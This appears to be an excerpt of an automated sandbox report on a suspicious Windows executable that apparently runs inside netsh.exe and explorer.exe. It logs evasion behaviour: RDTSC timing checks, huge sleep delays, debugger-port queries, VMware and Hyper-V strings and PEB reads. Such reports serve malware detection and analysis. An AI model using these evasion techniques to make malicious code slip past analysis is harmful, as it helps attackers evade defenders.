          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 4B30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 7860000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 8860000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 8A10000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMemory allocated: 9A10000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8472Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1473Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 860Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 9843Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-13832
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI coverage: 1.8 %
          Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 1.4 %
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe TID: 6820Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5064Thread sleep count: 8472 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5064Thread sleep time: -16944000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5064Thread sleep count: 1473 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5064Thread sleep time: -2946000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7100Thread sleep count: 128 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7100Thread sleep time: -256000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7100Thread sleep count: 9843 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7100Thread sleep time: -19686000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000000.1706307837.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000000.1703761960.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000004.00000002.4146493757.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000004.00000000.1706307837.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000002.4141036678.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000004.00000003.3108324353.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000004.00000002.4146493757.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000004.00000002.4146493757.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3114554074.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000003.3108324353.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000004.00000002.4143507586.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000004.00000000.1705502686.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000004.00000002.4141036678.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000004.00000002.4141036678.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01444144 mov eax, dword ptr fs:[00000030h]3_2_01444144
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01444144 mov eax, dword ptr fs:[00000030h]3_2_01444144
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01444144 mov ecx, dword ptr fs:[00000030h]3_2_01444144
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01444144 mov eax, dword ptr fs:[00000030h]3_2_01444144
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01444144 mov eax, dword ptr fs:[00000030h]3_2_01444144
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01443140 mov eax, dword ptr fs:[00000030h]3_2_01443140
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01443140 mov eax, dword ptr fs:[00000030h]3_2_01443140
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01443140 mov eax, dword ptr fs:[00000030h]3_2_01443140
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B1131 mov eax, dword ptr fs:[00000030h]3_2_013B1131
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B1131 mov eax, dword ptr fs:[00000030h]3_2_013B1131
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB136 mov eax, dword ptr fs:[00000030h]3_2_013AB136
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB136 mov eax, dword ptr fs:[00000030h]3_2_013AB136
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB136 mov eax, dword ptr fs:[00000030h]3_2_013AB136
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AB136 mov eax, dword ptr fs:[00000030h]3_2_013AB136
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485152 mov eax, dword ptr fs:[00000030h]3_2_01485152
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E0124 mov eax, dword ptr fs:[00000030h]3_2_013E0124
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01448158 mov eax, dword ptr fs:[00000030h]3_2_01448158
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01449179 mov eax, dword ptr fs:[00000030h]3_2_01449179
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AF172 mov eax, dword ptr fs:[00000030h]3_2_013AF172
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01470115 mov eax, dword ptr fs:[00000030h]3_2_01470115
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145A118 mov ecx, dword ptr fs:[00000030h]3_2_0145A118
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145A118 mov eax, dword ptr fs:[00000030h]3_2_0145A118
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145A118 mov eax, dword ptr fs:[00000030h]3_2_0145A118
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145A118 mov eax, dword ptr fs:[00000030h]3_2_0145A118
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B7152 mov eax, dword ptr fs:[00000030h]3_2_013B7152
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AC156 mov eax, dword ptr fs:[00000030h]3_2_013AC156
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B6154 mov eax, dword ptr fs:[00000030h]3_2_013B6154
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B6154 mov eax, dword ptr fs:[00000030h]3_2_013B6154
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9148 mov eax, dword ptr fs:[00000030h]3_2_013A9148
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9148 mov eax, dword ptr fs:[00000030h]3_2_013A9148
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9148 mov eax, dword ptr fs:[00000030h]3_2_013A9148
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9148 mov eax, dword ptr fs:[00000030h]3_2_013A9148
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014851CB mov eax, dword ptr fs:[00000030h]3_2_014851CB
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014761C3 mov eax, dword ptr fs:[00000030h]3_2_014761C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014761C3 mov eax, dword ptr fs:[00000030h]3_2_014761C3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CB1B0 mov eax, dword ptr fs:[00000030h]3_2_013CB1B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142E1D0 mov eax, dword ptr fs:[00000030h]3_2_0142E1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142E1D0 mov eax, dword ptr fs:[00000030h]3_2_0142E1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0142E1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142E1D0 mov eax, dword ptr fs:[00000030h]3_2_0142E1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142E1D0 mov eax, dword ptr fs:[00000030h]3_2_0142E1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AA197 mov eax, dword ptr fs:[00000030h]3_2_013AA197
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AA197 mov eax, dword ptr fs:[00000030h]3_2_013AA197
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AA197 mov eax, dword ptr fs:[00000030h]3_2_013AA197
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014861E5 mov eax, dword ptr fs:[00000030h]3_2_014861E5
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F0185 mov eax, dword ptr fs:[00000030h]3_2_013F0185
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014571F9 mov esi, dword ptr fs:[00000030h]3_2_014571F9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E01F8 mov eax, dword ptr fs:[00000030h]3_2_013E01F8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146C188 mov eax, dword ptr fs:[00000030h]3_2_0146C188
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146C188 mov eax, dword ptr fs:[00000030h]3_2_0146C188
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01407190 mov eax, dword ptr fs:[00000030h]3_2_01407190
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D51EF mov eax, dword ptr fs:[00000030h]3_2_013D51EF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B51ED mov eax, dword ptr fs:[00000030h]3_2_013B51ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143019F mov eax, dword ptr fs:[00000030h]3_2_0143019F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143019F mov eax, dword ptr fs:[00000030h]3_2_0143019F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143019F mov eax, dword ptr fs:[00000030h]3_2_0143019F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143019F mov eax, dword ptr fs:[00000030h]3_2_0143019F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014611A4 mov eax, dword ptr fs:[00000030h]3_2_014611A4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014611A4 mov eax, dword ptr fs:[00000030h]3_2_014611A4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014611A4 mov eax, dword ptr fs:[00000030h]3_2_014611A4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014611A4 mov eax, dword ptr fs:[00000030h]3_2_014611A4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013ED1D0 mov eax, dword ptr fs:[00000030h]3_2_013ED1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013ED1D0 mov ecx, dword ptr fs:[00000030h]3_2_013ED1D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01436050 mov eax, dword ptr fs:[00000030h]3_2_01436050
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AA020 mov eax, dword ptr fs:[00000030h]3_2_013AA020
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AC020 mov eax, dword ptr fs:[00000030h]3_2_013AC020
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145705E mov ebx, dword ptr fs:[00000030h]3_2_0145705E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145705E mov eax, dword ptr fs:[00000030h]3_2_0145705E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485060 mov eax, dword ptr fs:[00000030h]3_2_01485060
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE016 mov eax, dword ptr fs:[00000030h]3_2_013CE016
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE016 mov eax, dword ptr fs:[00000030h]3_2_013CE016
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE016 mov eax, dword ptr fs:[00000030h]3_2_013CE016
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE016 mov eax, dword ptr fs:[00000030h]3_2_013CE016
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143106E mov eax, dword ptr fs:[00000030h]3_2_0143106E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142D070 mov ecx, dword ptr fs:[00000030h]3_2_0142D070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01434000 mov ecx, dword ptr fs:[00000030h]3_2_01434000
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov ecx, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1070 mov eax, dword ptr fs:[00000030h]3_2_013C1070
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DC073 mov eax, dword ptr fs:[00000030h]3_2_013DC073
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B2050 mov eax, dword ptr fs:[00000030h]3_2_013B2050
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DB052 mov eax, dword ptr fs:[00000030h]3_2_013DB052
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01446030 mov eax, dword ptr fs:[00000030h]3_2_01446030
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147903E mov eax, dword ptr fs:[00000030h]3_2_0147903E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147903E mov eax, dword ptr fs:[00000030h]3_2_0147903E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147903E mov eax, dword ptr fs:[00000030h]3_2_0147903E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147903E mov eax, dword ptr fs:[00000030h]3_2_0147903E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142D0C0 mov eax, dword ptr fs:[00000030h]3_2_0142D0C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142D0C0 mov eax, dword ptr fs:[00000030h]3_2_0142D0C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014850D9 mov eax, dword ptr fs:[00000030h]3_2_014850D9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014320DE mov eax, dword ptr fs:[00000030h]3_2_014320DE
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E909C mov eax, dword ptr fs:[00000030h]3_2_013E909C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014360E0 mov eax, dword ptr fs:[00000030h]3_2_014360E0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B5096 mov eax, dword ptr fs:[00000030h]3_2_013B5096
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DD090 mov eax, dword ptr fs:[00000030h]3_2_013DD090
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DD090 mov eax, dword ptr fs:[00000030h]3_2_013DD090
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B208A mov eax, dword ptr fs:[00000030h]3_2_013B208A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AD08D mov eax, dword ptr fs:[00000030h]3_2_013AD08D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143D080 mov eax, dword ptr fs:[00000030h]3_2_0143D080
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143D080 mov eax, dword ptr fs:[00000030h]3_2_0143D080
